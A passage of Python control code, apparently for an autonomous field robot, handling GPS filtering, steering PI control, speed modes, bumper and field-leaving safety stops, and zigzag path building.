msg = "INIT: Failed to move camera to Y min, smoothie response:\n" + res
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
current_working_mode = working_mode_slow
slow_mode_time = time.time()
vesc_engine.set_target_rpm(
vesc_speed, vesc_engine.PROPULSION_KEY)
continue
sm_cur_pos = smoothie.get_smoothie_current_coordinates(
convert_to_mms=False)
if abs(sm_cur_pos["X"] - (config.X_MAX - config.X_MIN) / 2) < 0.001 and \
abs(sm_cur_pos["Y"] - (config.Y_MAX - config.Y_MIN) * config.SLOW_FAST_MODE_HEAD_FACTOR) < 0.001:
msg = "Switching from 'switching mode' to 'fast mode'"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
current_working_mode = working_mode_fast
# fast mode
elif current_working_mode == working_mode_fast:
if last_working_mode != current_working_mode:
last_working_mode = current_working_mode
msg = "[Working mode] : fast"
if config.LOG_SPEED_MODES:
logger_full.write_and_flush(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
if ExtractionManagerV3.any_plant_in_zone(
plants_boxes,
x_scan_poly[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else working_zone_polygon):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
if config.VERBOSE:
msg = "Moving cork to slow mode scan position\n"
logger_full.write(msg)
# smoothie.wait_for_all_actions_done()
res = smoothie.custom_separate_xy_move_to(
X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm(config.Y_MIN, "Y"))
if res != smoothie.RESPONSE_OK:
msg = "INIT: Failed to move camera to Y min, smoothie response:\n" + res
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
msg = "Switching from 'fast mode' to 'slow mode'"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
current_working_mode = working_mode_slow
slow_mode_time = time.time()
# TODO dont need anymore? as rpm is set at the end of slow mode
# vesc_engine.set_rpm(vesc_speed, vesc_engine.PROPULSION_KEY)
continue
elif close_to_end:
cur_vesc_rpm = vesc_engine.get_current_rpm(
vesc_engine.PROPULSION_KEY)
if cur_vesc_rpm != vesc_speed:
msg = f"Applying slow speed {vesc_speed} at 'fast mode' " \
f"(was {cur_vesc_rpm}) " \
f"because of close_to_end flag trigger"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
vesc_engine.set_target_rpm(
vesc_speed, vesc_engine.PROPULSION_KEY)
vesc_engine.set_current_rpm(
vesc_speed, vesc_engine.PROPULSION_KEY)
else:
cur_vesc_rpm = vesc_engine.get_current_rpm(
vesc_engine.PROPULSION_KEY)
if cur_vesc_rpm != vesc_speed_fast:
msg = f"Applying fast speed {vesc_speed_fast} at 'fast mode' (was {cur_vesc_rpm})"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
vesc_engine.set_target_rpm(
vesc_speed_fast, vesc_engine.PROPULSION_KEY)
vesc_engine.set_current_rpm(
vesc_speed_fast, vesc_engine.PROPULSION_KEY)
# NAVIGATION CONTROL
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
nav_start_t = time.time()
if start_Nav_while:
navigation_period = 1
else:
navigation_period = nav_start_t - prev_maneuver_time
navigations_period.append(navigation_period)
# time reference to decide the number of detection before resuming gps.get
prev_maneuver_time = nav_start_t
# print("tock")
if start_Nav_while:
prev_pos_obj = cur_pos_obj
prev_pos = prev_pos_obj.as_old_list
start_Nav_while = False
# mu_navigations_period, sigma_navigations_period = utility.mu_sigma(navigations_period)
navigation_prediction.set_current_lat_long(cur_pos)
# skip same points (non-blocking reading returns old point if new point isn't available yet)
if math.isclose(cur_pos_obj.creation_ts, prev_pos_obj.creation_ts):
# stop robot if there's no new points for a while
if time.time() - point_reading_t > config.GPS_POINT_TIME_BEFORE_STOP:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
msg = f"Stopping the robot due to exceeding time 'GPS_POINT_TIME_BEFORE_STOP=" \
f"{config.GPS_POINT_TIME_BEFORE_STOP}' limit without new gps points from adapter"
logger_full.write_and_flush(msg + "\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
gps_reconnect_ts = time.time()
while True:
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
if math.isclose(cur_pos_obj.creation_ts, prev_pos_obj.creation_ts):
# reconnect gps adapter to ublox if there's no gps points for a while
if time.time() - gps_reconnect_ts > config.GPS_POINT_TIME_BEFORE_RECONNECT:
gps.reconnect()
gps_reconnect_ts = time.time()
msg = "Called GPS adapter to reconnect to ublox due to waiting too much for a new GPS " \
"point (new points filter)"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
else:
msg = "New GPS point received, continuing movement"
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
else:
continue
# gps points reading time predictor
predictor_next_gps_expected_ts = cur_pos_obj.receiving_ts + config.GPS_POINT_WAIT_TIME_MAX
have_time_for_inference = True
# points filter by quality flag
if cur_pos[2] != "4" and config.ALLOW_GPS_BAD_QUALITY_NTRIP_RESTART:
# restart ntrip if enough time passed since the last ntrip restart
navigation.NavigationV3.restart_ntrip_service(logger_full)
# stop robot due to bad point quality if allowed
if config.ALLOW_GPS_BAD_QUALITY_STOP:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
logger_full.write_and_flush(
"Stopping the robot for lack of quality gps 4, waiting for it...\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
prev_bad_quality_pos_obj = cur_pos_obj
gps_reconnect_ts = time.time()
while True:
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
# check if it's a new point
if math.isclose(cur_pos_obj.creation_ts, prev_bad_quality_pos_obj.creation_ts):
# reconnect gps adapter to ublox if there's no gps points for a while
if time.time() - gps_reconnect_ts > config.GPS_POINT_TIME_BEFORE_RECONNECT:
gps.reconnect()
gps_reconnect_ts = time.time()
msg = "Called GPS adapter to reconnect to ublox due to waiting too much for a new " \
"GPS point (quality filter)"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
continue
else:
prev_bad_quality_pos_obj = cur_pos_obj
# check if it's a good quality point
if cur_pos[2] != "4":
# restart ntrip if enough time passed since the last ntrip restart
navigation.NavigationV3.restart_ntrip_service(
logger_full)
else:
msg = "The gps has regained quality 4, starting movement"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
# points filter by distance
prev_cur_distance = nav.get_distance(prev_pos, cur_pos)
if config.ALLOW_GPS_PREV_CUR_DIST_STOP and prev_cur_distance > config.PREV_CUR_POINT_MAX_DIST:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
msg = f"Stopping the robot due to GPS points filter by distance (assuming current position point " \
f"{str(cur_pos)} is wrong as distance between current position and prev. position {str(prev_pos)}" \
f" is bigger than config.PREV_CUR_POINT_MAX_DIST={str(config.PREV_CUR_POINT_MAX_DIST)})"
logger_full.write_and_flush(msg + "\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
prev_bad_quality_pos_obj = cur_pos_obj
gps_reconnect_ts = distance_wait_start_ts = time.time()
while True:
if time.time() - distance_wait_start_ts > config.GPS_DIST_WAIT_TIME_MAX:
msg = f"Stopping waiting for good prev-cur distance due to timeout, using current point " \
f"{cur_pos} and starting moving again"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
# check if it's a new point
if math.isclose(cur_pos_obj.creation_ts, prev_bad_quality_pos_obj.creation_ts):
# reconnect gps adapter to ublox if there's no gps points for a while
if time.time() - gps_reconnect_ts > config.GPS_POINT_TIME_BEFORE_RECONNECT:
gps.reconnect()
gps_reconnect_ts = time.time()
msg = "Called GPS adapter to reconnect to ublox due to waiting too much for a new " \
"GPS point (distance filter)"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
continue
else:
prev_bad_quality_pos_obj = cur_pos_obj
# check if it's a good quality point or ignore point quality if bad quality stop is not allowed
if cur_pos[2] != "4" and config.ALLOW_GPS_BAD_QUALITY_NTRIP_RESTART:
# restart ntrip if enough time passed since the last ntrip restart
navigation.NavigationV3.restart_ntrip_service(logger_full)
continue
# check if distance became ok
prev_cur_distance = nav.get_distance(prev_pos, cur_pos)
if prev_cur_distance <= config.PREV_CUR_POINT_MAX_DIST:
msg = f"Starting moving again after GPS points filter by distance as distance become OK " \
f"({str(prev_cur_distance)})"
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
point_reading_t = time.time()
trajectory_saver.save_point(cur_pos)
if ui_msg_queue is not None and time.time()-last_send_gps_time >= 1:
try:
ui_msg_queue_send_ts = time.time()
ui_msg_queue.send(json.dumps(
{"last_gps": cur_pos}), timeout=config.QUEUE_WAIT_TIME_MAX)
last_send_gps_time = time.time()
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_send_et = last_send_gps_time - ui_msg_queue_send_ts
if ui_msg_queue_send_et < ui_msg_queue_perf["min_time"]:
ui_msg_queue_perf["min_time"] = ui_msg_queue_send_et
if ui_msg_queue_send_et > ui_msg_queue_perf["max_time"]:
ui_msg_queue_perf["max_time"] = ui_msg_queue_send_et
ui_msg_queue_perf["total_time"] += ui_msg_queue_send_et
ui_msg_queue_perf["total_sends"] += 1
except posix_ipc.BusyError:
msg = f"Current position wasn't sent to ui_msg_queue likely due to sending timeout " \
f"(max wait time: config.QUEUE_WAIT_TIME_MAX={config.QUEUE_WAIT_TIME_MAX}"
logger_full.write(msg + "\n")
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_perf["timeouts_exceeded"] += 1
if config.CONTINUOUS_INFORMATION_SENDING and not degraded_navigation_mode:
notification.set_current_coordinate(cur_pos)
distance = nav.get_distance(cur_pos, coords_from_to[1])
last_corridor_side = current_corridor_side
perpendicular, current_corridor_side = nav.get_deviation(
coords_from_to[0], coords_from_to[1], cur_pos)
# stop the robot if it has left the field
if enable_field_leaving_protection:
for pt_idx in range(len(cur_field)):
last_point = pt_idx + 1 == len(cur_field)
if last_point:
deviation, side = nav.get_deviation(cur_field[pt_idx], cur_field[0], cur_pos)
else:
deviation, side = nav.get_deviation(cur_field[pt_idx], cur_field[pt_idx + 1], cur_pos)
if side == -1 and deviation > config.LEAVING_PROTECTION_DISTANCE_MAX:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
msg = f"Robot is stopped due to leaving the field. Cur pos: '{str(cur_pos)}'; " \
f"Field comparison vector - P1: '{str(cur_field[pt_idx])}', " \
f"P2: '{str(cur_field[0] if last_point else cur_field[pt_idx + 1])}'"
print(msg)
logger_full.write_and_flush(msg + "\n")
notification.set_robot_state(RobotStates.OUT_OF_SERVICE)
exit()
# check if arrived
_, side = nav.get_deviation(
coords_from_to[1], stop_helping_point, cur_pos)
# if distance <= config.COURSE_DESTINATION_DIFF: # old way
if side != 1: # TODO: maybe should use both side and distance checking methods at once
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
# msg = "Arrived (allowed destination distance difference " + str(config.COURSE_DESTINATION_DIFF) + " mm)"
# TODO: service will reload script even if it done his work?
msg = "Arrived to " + str(coords_from_to[1])
# print(msg)
logger_full.write(msg + "\n")
# put the wheel straight
if wheels_straight:
response = smoothie.custom_move_to(A_F=config.A_F_MAX, A=0)
if response != smoothie.RESPONSE_OK: # TODO: what if response is not ok?
msg = "Couldn't turn wheels to center (0), smoothie response:\n" + \
response
print(msg)
logger_full.write(msg + "\n")
else:
# save wheels angle
with open(config.LAST_ANGLE_WHEELS_FILE, "w+") as wheels_angle_file:
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
break
# TODO check for bug: arrival check applies single speed for all path (while multiple speeds are applied)
# check if can arrived
if vesc_engine.get_current_rpm(vesc_engine.PROPULSION_KEY) / config.MULTIPLIER_SI_SPEED_TO_RPM * \
config.MANEUVERS_FREQUENCY > nav.get_distance(cur_pos, coords_from_to[1]):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
msg = "Will have arrived before the next point to " + \
str(coords_from_to[1])
# print(msg)
logger_full.write(msg + "\n")
break
# reduce speed if near the target point
if config.USE_SPEED_LIMIT:
distance_from_start = nav.get_distance(coords_from_to[0], cur_pos)
close_to_end = distance < config.DECREASE_SPEED_TRESHOLD or distance_from_start < config.DECREASE_SPEED_TRESHOLD
msg = "Distance to B: " + str(distance)
# print(msg)
logger_full.write(msg + "\n")
msg = "Prev: " + str(prev_pos) + " Cur: " + str(cur_pos) + " A: " + str(coords_from_to[0]) \
+ " B: " + str(coords_from_to[1])
# print(msg)
logger_full.write(msg + "\n")
# pass by cur points which are very close to prev point to prevent angle errors when robot is staying
# (too close points in the same position can produce false huge angles)
navigation_prediction.run_prediction(coords_from_to, cur_pos)
# raw_angle_cruise = nav.get_angle(coords_from_to[0], cur_pos, cur_pos, coords_from_to[1])
# raw_angle_legacy = nav.get_angle(prev_pos, cur_pos, cur_pos, coords_from_to[1])
raw_angle_centroid = nav.get_angle(
prev_pos, cur_pos, coords_from_to[0], coords_from_to[1])
raw_angle_cruise = - current_corridor_side * math.log(1+perpendicular)
if nav.get_distance(coords_from_to[0], coords_from_to[1]) < config.CORNER_THRESHOLD and nav.get_distance(coords_from_to[1], future_points[0][0]) < config.CORNER_THRESHOLD:
# if abs(raw_angle_legacy)>config.LOST_THRESHOLD:
centroid_factor = config.CENTROID_FACTOR_LOST
cruise_factor = 1/centroid_factor
else:
centroid_factor = config.CENTROID_FACTOR_ORIENTED
cruise_factor = 1
raw_angle = raw_angle_centroid*centroid_factor + raw_angle_cruise*cruise_factor
# raw_angle = butter_lowpass_filter(raw_angle, 0.5, 4, 6)
if config.LEARN_GO_STRAIGHT:
if config.MIN_PERPENDICULAR_GO_STRAIGHT >= perpendicular:
learn_go_straight_index += 1
learn_go_straight_history.append(raw_angle)
if len(learn_go_straight_history) >= config.VALUES_LEARN_GO_STRAIGHT:
learn_go_straight = sum(
learn_go_straight_history)/len(learn_go_straight_history)
msg = f"Average angle applied to the wheel for the robot to have found : {learn_go_straight}."
logger_full.write_and_flush(msg + "\n")
# TODO opening and closing file 4 times per second
with open(config.LEARN_GO_STRAIGHT_FILE, "w+") as learn_go_straight_file:
learn_go_straight_file.write(str(learn_go_straight))
else:
learn_go_straight_index = 0
# NAVIGATION STATE MACHINE
if prev_cur_distance < config.PREV_CUR_POINT_MIN_DIST:
raw_angle = last_correct_raw_angle
# print("The distance covered is low")
point_status = "skipped"
# register the last position where the robot almost stop
# in order to disable the deviation servo for a config.POURSUIT_LIMIT length and then resume in cruise
last_skipped_point = cur_pos
else:
last_correct_raw_angle = raw_angle
point_status = "correct"
almost_start = nav.get_distance(last_skipped_point, cur_pos)
# sum(e)
if len(raw_angles_history) >= config.WINDOW:
raw_angles_history.pop(0)
raw_angles_history.append(raw_angle)
# print("len(raw_angles_history):",len(raw_angles_history))
sum_angles = sum(raw_angles_history)
if sum_angles > config.SUM_ANGLES_HISTORY_MAX:
msg = "Sum angles " + str(sum_angles) + " is bigger than max allowed value " + \
str(config.SUM_ANGLES_HISTORY_MAX) + ", setting to " + \
str(config.SUM_ANGLES_HISTORY_MAX)
# print(msg)
logger_full.write(msg + "\n")
# Get Ready to go down as soon as the angle get negatif
raw_angles_history[len(raw_angles_history) -
1] -= sum_angles - config.SUM_ANGLES_HISTORY_MAX
sum_angles = config.SUM_ANGLES_HISTORY_MAX
elif sum_angles < -config.SUM_ANGLES_HISTORY_MAX:
msg = "Sum angles " + str(sum_angles) + " is less than min allowed value " + \
str(-config.SUM_ANGLES_HISTORY_MAX) + ", setting to " + \
str(-config.SUM_ANGLES_HISTORY_MAX)
# print(msg)
logger_full.write(msg + "\n")
# get Ready to go up as soon as the angle get positive:
raw_angles_history[len(raw_angles_history)-1] += - \
sum_angles - config.SUM_ANGLES_HISTORY_MAX
sum_angles = -config.SUM_ANGLES_HISTORY_MAX
# KP = 0.2*0,55
# KI = 0.0092*0,91
KP = getSpeedDependentConfigParam(
config.KP, SI_speed, "KP", logger_full)
KI = getSpeedDependentConfigParam(
config.KI, SI_speed, "KI", logger_full)
angle_kp_ki = raw_angle * KP + sum_angles * KI
# smoothie -Value == left, Value == right
target_angle_sm = angle_kp_ki * -config.A_ONE_DEGREE_IN_SMOOTHIE
# target_angle_sm = 0 #Debug COVID_PLACE
ad_wheels_pos = smoothie.get_adapter_current_coordinates()["A"]
# sm_wheels_pos = smoothie.get_smoothie_current_coordinates()["A"]
sm_wheels_pos = "off"
# compute order angle (smoothie can't turn for huge values immediately also as cancel movement,
# so we need to do nav. actions in steps)
order_angle_sm = target_angle_sm - ad_wheels_pos
# check for out of update frequency and smoothie execution speed range (for nav wheels)
if order_angle_sm > config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND * \
config.A_ONE_DEGREE_IN_SMOOTHIE:
msg = "Order angle changed from " + str(order_angle_sm) + " to " + str(
config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND +
config.A_ONE_DEGREE_IN_SMOOTHIE) + " due to exceeding degrees per tick allowed range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND * \
config.A_ONE_DEGREE_IN_SMOOTHIE
elif order_angle_sm < -(config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND *
config.A_ONE_DEGREE_IN_SMOOTHIE):
msg = "Order angle changed from " + str(order_angle_sm) + " to " + str(-(
config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND *
config.A_ONE_DEGREE_IN_SMOOTHIE)) + " due to exceeding degrees per tick allowed range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = -(config.MANEUVERS_FREQUENCY * config.A_DEGREES_PER_SECOND *
config.A_ONE_DEGREE_IN_SMOOTHIE)
# convert to global smoothie coordinates
order_angle_sm += ad_wheels_pos
# checking for out of smoothie supported range
if order_angle_sm > config.A_MAX:
msg = "Global order angle changed from " + str(order_angle_sm) + " to config.A_MAX = " + \
str(config.A_MAX) + \
" due to exceeding smoothie allowed values range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = config.A_MAX
elif order_angle_sm < config.A_MIN:
msg = "Global order angle changed from " + str(order_angle_sm) + " to config.A_MIN = " + \
str(config.A_MIN) + \
" due to exceeding smoothie allowed values range."
# print(msg)
logger_full.write(msg + "\n")
order_angle_sm = config.A_MIN
# cork x movement during periphery scans control
if config.ALLOW_X_MOVEMENT_DURING_SCANS:
if x_scan_idx_increasing:
x_scan_cur_idx += 1
if x_scan_cur_idx >= len(config.X_MOVEMENT_CAMERA_POSITIONS):
x_scan_idx_increasing = False
x_scan_cur_idx -= 2
else:
x_scan_cur_idx -= 1
if x_scan_cur_idx < 0:
x_scan_idx_increasing = True
x_scan_cur_idx += 2
# TODO do we check SI_speed earlier and do proper calculations and angle validations if here we'll get here a negative order angle instead of positive?
response = smoothie.custom_move_to(
A_F=config.A_F_MAX,
A=order_angle_sm if SI_speed >= 0 else -order_angle_sm,
X_F=config.X_MOVEMENT_CAMERA_X_F[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else None,
X=config.X_MOVEMENT_CAMERA_POSITIONS[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else None
)
if response != smoothie.RESPONSE_OK:
msg = "Couldn't turn wheels! Smoothie response:\n" + response
print(msg)
logger_full.write(msg + "\n")
else:
# TODO opening and closing file too often (likely 4 times per second)
# save wheels angle
with open(config.LAST_ANGLE_WHEELS_FILE, "w+") as wheels_angle_file:
wheels_angle_file.write(
str(smoothie.get_adapter_current_coordinates()["A"]))
raw_angle = round(raw_angle, 2)
angle_kp_ki = round(angle_kp_ki, 2)
order_angle_sm = round(order_angle_sm, 2)
sum_angles = round(sum_angles, 2)
distance = round(distance, 2)
ad_wheels_pos = round(ad_wheels_pos, 2)
perpendicular = round(perpendicular, 2)
# sm_wheels_pos = round(sm_wheels_pos, 2)
gps_quality = cur_pos[2]
corridor = ""
if current_corridor_side == -1:
corridor = "left"
elif current_corridor_side == 1:
corridor = "right"
raw_angle_cruise = round(raw_angle_cruise, 2)
msg = str(gps_quality).ljust(5) + \
str(raw_angle).ljust(8) + \
str(angle_kp_ki).ljust(8) + \
str(order_angle_sm).ljust(8) + \
str(sum_angles).ljust(8) + \
str(distance).ljust(13) + \
str(ad_wheels_pos).ljust(8) + \
str(sm_wheels_pos).ljust(9) + \
point_status.ljust(12) + \
str(perpendicular).ljust(10) + \
corridor.ljust(9) + \
str(centroid_factor).ljust(16) + \
str(cruise_factor).ljust(14)
print(msg)
logger_full.write(msg + "\n")
# TODO vesc sensors are being asked 4 times per second
# send voltage and track bumper state
vesc_data = vesc_engine.get_sensors_data(
report_field_names, vesc_engine.PROPULSION_KEY)
if vesc_data is not None and "input_voltage" in vesc_data:
if bumper_is_pressed is None:
bumper_is_pressed = not vesc_data["input_voltage"] > config.VESC_BUMBER_UNTRIGGER_VOLTAGE
if bumper_is_pressed:
msg = f"Bumper is pressed initially before starting moving to point. " \
f"({vesc_data['input_voltage']}V)"
logger_full.write(msg + "\n")
elif not bumper_is_pressed and vesc_data["input_voltage"] < config.VESC_BUMBER_TRIGGER_VOLTAGE:
bumper_is_pressed = True
msg = f"Bumper was pressed. ({vesc_data['input_voltage']}V)"
logger_full.write(msg + "\n")
elif bumper_is_pressed and vesc_data["input_voltage"] > config.VESC_BUMBER_UNTRIGGER_VOLTAGE:
bumper_is_pressed = False
msg = f"Bumper was unpressed. ({vesc_data['input_voltage']}V)"
logger_full.write(msg + "\n")
if config.CONTINUOUS_INFORMATION_SENDING:
notification.set_input_voltage(vesc_data["input_voltage"])
prev_pos_obj = cur_pos_obj
prev_pos = prev_pos_obj.as_old_list
msg = "Nav calc time: " + str(time.time() - nav_start_t)
logger_full.write(msg + "\n\n")
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_perf["avg_time"] = ui_msg_queue_perf["total_time"] / \
ui_msg_queue_perf["total_sends"]
msg = f"Position sending performance report: {ui_msg_queue_perf}"
if config.VERBOSE:
print(msg)
logger_full.write(msg + "\n")
def send_voltage_thread_tf(vesc_engine: adapters.VescAdapterV4, ui_msg_queue):
vesc_data = None
while vesc_data is None:
vesc_data = vesc_engine.get_sensors_data(
['input_voltage'], vesc_engine.PROPULSION_KEY)
if vesc_data is not None:
input_voltage = vesc_data["input_voltage"]
if ui_msg_queue is not None:
ui_msg_queue.send(json.dumps({"input_voltage": input_voltage}))
else:
time.sleep(1)
def getSpeedDependentConfigParam(configParam: dict, SI_speed: float, paramName: str, logger_full: utility.Logger):
if SI_speed in configParam:
return configParam[SI_speed]
else:
msg = f"Speed SI {SI_speed} not present in {paramName}."
if config.VERBOSE:
print(msg)
logger_full.write(msg + "\n")
exit()
def compute_x1_x2_points(point_a: list, point_b: list, nav: navigation.GPSComputing, logger: utility.Logger):
"""
Computes p. x1 with config distance from p. A and p. x2 with the same distance from p. B. Distance is loaded from
config file. Returns None if AB <= that distance (as there's no place for robot maneuvers).
:param point_a:
:param point_b:
:param nav:
:param logger:
:return:
"""
cur_vec_dist = nav.get_distance(point_a, point_b)
# check if moving vector is too small for maneuvers
if config.MANEUVER_START_DISTANCE * 2 >= cur_vec_dist:
msg = "No place for maneuvers; config start maneuver distance is (that will be multiplied by 2): " + \
str(config.MANEUVER_START_DISTANCE) + " current moving vector distance is: " + str(cur_vec_dist) + \
" Given points are: " + str(point_a) + " " + str(point_b)
# print(msg)
logger.write(msg + "\n")
return None, None
point_x1 = nav.get_point_on_vector(
point_a, point_b, config.MANEUVER_START_DISTANCE)
point_x2 = nav.get_point_on_vector(
point_a, point_b, cur_vec_dist - config.MANEUVER_START_DISTANCE)
return point_x1, point_x2
def compute_x2_spiral(point_a: list, point_b: list, nav: navigation.GPSComputing, logger: utility.Logger):
"""
Computes p. x2 with distance + spiral interval distance from p. B. Distances are loaded from
config file. Returns None if AB <= distance * 2 + interval (as there's no place for robot maneuvers).
:param point_a:
:param point_b:
:param nav:
:param logger:
:return:
"""
cur_vec_dist = nav.get_distance(point_a, point_b)
# check if moving vector is too small for maneuvers
if config.MANEUVER_START_DISTANCE * 2 + config.SPIRAL_SIDES_INTERVAL >= cur_vec_dist:
msg = "No place for maneuvers; Config maneuver distance is (that will be multiplied by 2): " + \
str(config.MANEUVER_START_DISTANCE) + " Config spiral interval: " + str(config.SPIRAL_SIDES_INTERVAL) + \
" Current moving vector distance is: " + str(cur_vec_dist) + " Given points are: " + str(point_a) + \
" " + str(point_b)
# print(msg)
logger.write(msg + "\n")
return None
return nav.get_point_on_vector(
point_a,
point_b,
cur_vec_dist - config.MANEUVER_START_DISTANCE - config.SPIRAL_SIDES_INTERVAL)
def compute_x1_x2_int_points(point_a: list, point_b: list, nav: navigation.GPSComputing, logger: utility.Logger):
"""
Computes spiral interval points x1, x2
:param point_a:
:param point_b:
:param nav:
:param logger:
:return:
"""
cur_vec_dist = nav.get_distance(point_a, point_b)
# check if moving vector is too small for maneuvers
if config.SPIRAL_SIDES_INTERVAL * 2 >= cur_vec_dist:
msg = "No place for maneuvers; Config spiral interval (that will be multiplied by 2): " + \
str(config.SPIRAL_SIDES_INTERVAL) + " Current moving vector distance is: " + str(cur_vec_dist) + \
" Given points are: " + str(point_a) + " " + str(point_b)
if config.VERBOSE:
print(msg)
logger.write(msg + "\n")
return None, None
point_x1_int = nav.get_point_on_vector(
point_a, point_b, config.SPIRAL_SIDES_INTERVAL)
point_x2_int = nav.get_point_on_vector(
point_a, point_b, cur_vec_dist - config.SPIRAL_SIDES_INTERVAL)
return point_x1_int, point_x2_int
def add_points_to_path(path: list, *args):
"""Tries to add given points into given path.
Returns True if all points are added successfully
Returns False if one of given points is None
If point is None - previous not None points will be added, further points addition will is canceled and False is
returned"""
for point in args:
if point is None:
return False
if len(point) > 1:
if point[0] is None:
return False
path.append(point)
return True
def check_points_for_nones(*args):
"""Checks if any of given points is None.
Returns True if all given points are not Nones.
Returns False if any of given points is None."""
for point in args:
if point is None:
return False
return True
def compute_bezier_points(point_0, point_1, point_2):
t = np.linspace(0, 1, config.NUMBER_OF_BEZIER_POINT)
coords = list()
for i in t:
x = (point_0[0] - 2 * point_1[0] + point_2[0]) * (i ** 2) + \
(2 * point_1[0] - 2 * point_0[0]) * i + point_0[0]
y = (point_0[1] - 2 * point_1[1] + point_2[1]) * (i ** 2) + \
(2 * point_1[1] - 2 * point_0[1]) * i + point_0[1]
coords.append([x, y])
return coords
def get_rectangle_isosceles_side(turning_radius):
# Bezier refer \Nextcloud\3. Engineering\navigation
return (0.5*(turning_radius*((2**0.5)-1))**2)**0.5
def corner_finish_rounds(turning_radius: float):
if config.VERBOSE:
print("black corridor width at full steering %2.0f" %
get_rectangle_isosceles_side(turning_radius), " millimeters")
# how many corner round due to robot working width
return int((get_rectangle_isosceles_side(turning_radius))/config.FIELD_REDUCE_SIZE)+1
def add_forward_backward_path(abcd_points: list, nav: navigation.GPSComputing, logger: utility.Logger, SI_speed_fwd: float, SI_speed_rev: float, currently_path: list):
raise NotImplementedError(
"an obsolete code, use build_forward_backward_path() instead")
if not config.ADD_FORWARD_BACKWARD_TO_END_PATH and not config.FORWARD_BACKWARD_PATH:
return currently_path
a, b, c, d = abcd_points[0], abcd_points[1], abcd_points[2], abcd_points[3]
fwd = SI_speed_fwd
rev = SI_speed_rev
while nav.get_distance(b, c) > config.SPIRAL_SIDES_INTERVAL:
if not add_points_to_path(currently_path, [b, fwd]):
return currently_path
if not add_points_to_path(currently_path, [a, rev]):
return currently_path
a = compute_x1_x2(a, d, config.SPIRAL_SIDES_INTERVAL, nav)[0]
b = compute_x1_x2(b, c, config.SPIRAL_SIDES_INTERVAL, nav)[0]
if not add_points_to_path(currently_path, [b, fwd]):
return currently_path
if not add_points_to_path(currently_path, [a, rev]):
return currently_path
return currently_path
def build_forward_backward_path(abcd_points: list,
nav: navigation.GPSComputing,
logger: utility.Logger,
SI_speed_fwd: float,
SI_speed_rev: float,
path: list = None):
"""Builds zigzag (forward-backward) path to fill given ABCD field.
Can process 4 non 90 degrees corners fields.
Will append zigzag points into the existing path if it is not None, otherwise creates a path from scratch.
Returns python list of gps [[latitude, longitude], speed] points."""
if type(abcd_points) != list:
msg = f"Given ABCD path must be a list, got {type(abcd_points).__name__} instead"
raise TypeError(msg)
if len(abcd_points) != 4:
msg = f"Expected 4 ABCD points as input field, got {str(len(abcd_points))} points instead"
raise ValueError(msg)
for point_name, point in zip("ABCD", abcd_points):
if type(point) != list:
